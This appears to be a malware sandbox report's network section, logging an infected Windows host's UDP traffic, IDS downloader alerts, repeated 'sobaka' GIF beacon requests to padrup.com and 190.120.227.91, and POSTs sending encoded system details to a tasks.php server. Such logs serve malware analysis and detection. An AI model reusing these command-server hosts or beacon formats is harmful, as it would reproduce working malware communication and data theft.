        Source: global trafficUDP traffic: 192.168.2.9:57682 -> 188.72.28.186:7617
        Source: global trafficUDP traffic: 192.168.2.9:57683 -> 59.99.50.127:4783
        Source: global trafficUDP traffic: 192.168.2.9:57684 -> 125.160.141.184:4510
        Source: global trafficUDP traffic: 192.168.2.9:57685 -> 85.186.185.172:5549
        Source: global trafficUDP traffic: 192.168.2.9:52345 -> 93.81.148.235:7368
        Source: global trafficUDP traffic: 192.168.2.9:52346 -> 78.97.126.19:6028
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49736 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49730 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49719 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49725 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49729 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49737 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49712 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49709 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49707 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49806 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49784 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49731 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49738 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49728 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49732 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49722 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49767 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49814 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49759 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49716 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49842 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49835 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49726 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49723 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49861 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49741 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49870 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49727 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49724 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49918 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49889 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49927 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49735 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49789 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50039 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50036 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50037 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50045 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50049 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49899 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50056 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50040 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50051 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50043 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50042 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50028 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49949 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50041 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50050 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49983 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50064 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50061 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50027 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50030 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50038 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50033 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50052 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50029 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50059 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50001 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50032 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50053 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50034 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50007 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49721 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50035 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50057 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50055 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50062 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49977 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49740 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50048 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50054 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50058 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49955 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50044 -> 185.53.178.50:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50060 -> 190.120.227.91:8080
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50046 -> 185.53.178.50:80
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?72f523=7533859 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?74d2bd=76561250 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?df9780=58613248 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?7caa7d=57190763 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?7d519a=82128900 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?cb36a4=13317796 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?eaa8c1=153786250 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?165b05c=164090500 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?18a856f=77566029 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?20c2a09=309164625 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?22aca7d=145435124 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?2a61d79=222204765 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?2c5425f=92964030 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?333df63=53731171 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?352e846=390355434 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?3d3b9b1=192621843 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?3ff2df5=201165279 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST /n/tasks.php HTTP/1.0Host: n.ddnsgratis.com.brUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0Content-type: application/x-www-form-urlencodedCookie: auth=bc00595440e801f8a5d2a2ad13b9791bContent-length: 12Data Raw: 5f 77 76 3d 5a 57 35 30 5a 58 49 3d 0a Data Ascii: _wv=ZW50ZXI=
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?47aa66b=526028013 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?4991659=617132744 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?50e8edc=169680312 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?542972c=882501560 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?5b7e0de=767493872 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?10d62ae4=564942280 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?115dbf54=-1381402296 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?1176f212=293007890 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?11fef99e=-1275740116 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?121e2607=-1559275969 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?12ba214d=-2095650533 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?12d42dc2=947685702 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?13de3bbe=-1294984786 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?140deb53=-1939771579 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?1495f698=690744624 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST /n/tasks.php HTTP/1.0Host: n.ddnsgratis.com.brUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0Content-type: application/x-www-form-urlencodedCookie: auth=bc00595440e801f8a5d2a2ad13b9791bContent-length: 192Data Raw: 5f 77 76 3d 59 32 31 6b 4a 6a 6c 6c 4d 54 51 32 59 6d 55 35 4c 57 4d 33 4e 6d 45 74 4e 44 63 79 4d 43 31 69 59 32 52 69 4c 54 55 7a 4d 44 45 78 59 6a 67 33 59 6d 51 77 4e 69 5a 6b 52 32 78 31 57 56 4e 42 4e 6b 6c 47 55 6b 70 55 61 30 56 30 56 55 56 4e 5a 30 39 70 51 54 52 4f 65 6d 63 77 54 56 52 46 4a 54 4e 45 4a 6c 64 70 62 6d 52 76 64 33 4d 6c 4d 6a 41 78 4d 43 55 79 4d 43 67 32 4e 43 31 69 61 58 51 70 4a 6a 45 6d 56 32 6c 75 5a 47 39 33 63 79 55 79 4d 45 52 6c 5a 6d 56 75 5a 47 56 79 4a 6a 55 75 4d 53 59 78 4f 43 34 78 4d 43 34 79 4d 44 49 30 4a 6b 35 50 54 6b 55 3d 0a Data Ascii: _wv=Y21kJjllMTQ2YmU5LWM3NmEtNDcyMC1iY2RiLTUzMDExYjg3YmQwNiZkR2x1WVNBNklGUkpUa0V0VUVNZ09pQTROemcwTVRFJTNEJldpbmRvd3MlMjAxMCUyMCg2NC1iaXQpJjEmV2luZG93cyUyMERlZmVuZGVyJjUuMSYxOC4xMC4yMDI0Jk5PTkU=
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?14b59e3b=1737234215 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?1543ef95=713547562 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?15aba7b5=-659256046 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?16b31880=-867443584 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?16d8692d=1149844359 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?1781559f=-1928855110 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?17a69eba=-1120602672 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?18285ae2=405297890 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?1847fe9d=-1443367349 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?18b777d9=-977551672 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?18d65779=-1378065329 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?195904b8=425264312 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?19856214=856343592 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?1a078ca7=-1238050671 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?253429ca=1872526686 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST /n/tasks.php HTTP/1.0Host: n.ddnsgratis.com.brUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0Content-type: application/x-www-form-urlencodedCookie: auth=bc00595440e801f8a5d2a2ad13b9791bContent-length: 192Data Raw: 5f 77 76 3d 59 32 31 6b 4a 6a 6c 6c 4d 54 51 32 59 6d 55 35 4c 57 4d 33 4e 6d 45 74 4e 44 63 79 4d 43 31 69 59 32 52 69 4c 54 55 7a 4d 44 45 78 59 6a 67 33 59 6d 51 77 4e 69 5a 6b 52 32 78 31 57 56 4e 42 4e 6b 6c 47 55 6b 70 55 61 30 56 30 56 55 56 4e 5a 30 39 70 51 54 52 4f 65 6d 63 77 54 56 52 46 4a 54 4e 45 4a 6c 64 70 62 6d 52 76 64 33 4d 6c 4d 6a 41 78 4d 43 55 79 4d 43 67 32 4e 43 31 69 61 58 51 70 4a 6a 45 6d 56 32 6c 75 5a 47 39 33 63 79 55 79 4d 45 52 6c 5a 6d 56 75 5a 47 56 79 4a 6a 55 75 4d 53 59 78 4f 43 34 78 4d 43 34 79 4d 44 49 30 4a 6b 35 50 54 6b 55 3d 0a Data Ascii: _wv=Y21kJjllMTQ2YmU5LWM3NmEtNDcyMC1iY2RiLTUzMDExYjg3YmQwNiZkR2x1WVNBNklGUkpUa0V0VUVNZ09pQTROemcwTVRFJTNEJldpbmRvd3MlMjAxMCUyMCg2NC1iaXQpJjEmV2luZG93cyUyMERlZmVuZGVyJjUuMSYxOC4xMC4yMDI0Jk5PTkU=
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?25bc9cf1=633117937 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?25d5c2b0=-486371296 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?269bb762=239207342 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?270a0145=-2040263502 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?27c85804=-957761516 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?27fe3552=-1611082424 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?28892810=465574000 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?28a2e80b=-204378046 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobaka1.gif?2924596e=690248046 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: padrup.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?2945db31=1244584328 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 190.120.227.91:8080Cache-Control: no-cache
